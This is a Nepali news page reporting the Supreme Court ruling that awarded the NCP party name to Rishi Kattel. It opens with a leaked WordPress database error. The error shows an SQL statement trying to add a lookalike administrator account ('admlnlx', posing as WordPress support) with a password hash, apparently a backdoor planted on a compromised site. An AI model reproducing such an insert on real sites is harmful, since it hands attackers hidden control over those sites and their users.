WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvXplnqbYN/Vgp4sAp5ftpLd/EEPJU0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 11:32:51', '', 'admlnlx', 'admlnlx')

नेकपा आधिकारिकता विवाद : ऋषि कट्टेलले जिते मुद्दा – Gaule Khabar

नेकपा आधिकारिकता विवाद : ऋषि कट्टेलले जिते मुद्दा

नेकपा आधिकारिकता विवाद : ऋषि कट्टेलले जिते मुद्दा
फाइल फोटो

काठमाण्डौ । नेकपाको आधिकारिकता ऋषि कट्टेलले पाएका छन् । यो सँगै नेकपा नाम अब ऋषि कट्टेलले पाउने भएका छन् ।
सर्वोच्च अदालतले आइतबार गरेको फैसलामा कट्टेललाई नेकपाको आधिकारिकता दिने निर्णय गरेको हो ।

सर्वोच्च अदालतले नेपाल कम्युनिस्ट पार्टीको आधिकारिकता ऋषि कट्टेललाई दिएपछि ओली प्रचण्डको नेकपा खारेज भएको छ ।

निर्वाचन आयोगमा ऋषि कट्टेल अध्यक्ष रहेको नेपाल कम्युनिस्ट पार्टी दर्ता भइसकेको अवस्थामा ३ जेठ २०७५ मा तत्कालिन नेकपा एमाले र नेकपा माओवादी केन्द्रबीच एकीकरण भएपछि उक्त पार्टीको नाम पनि नेपाल कम्युनिस्ट पार्टी (ने क पा) राखी निर्वाचन आयोगमा पेश गरेका थिए ।

आफ्नो पार्टीको नामसँग मिल्दोजुल्दो नाम दिएर अर्को पार्टी दर्ता गर्न दिएको भन्दै कट्टेलले सर्वोच्च अदालतमा रिट दिएका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका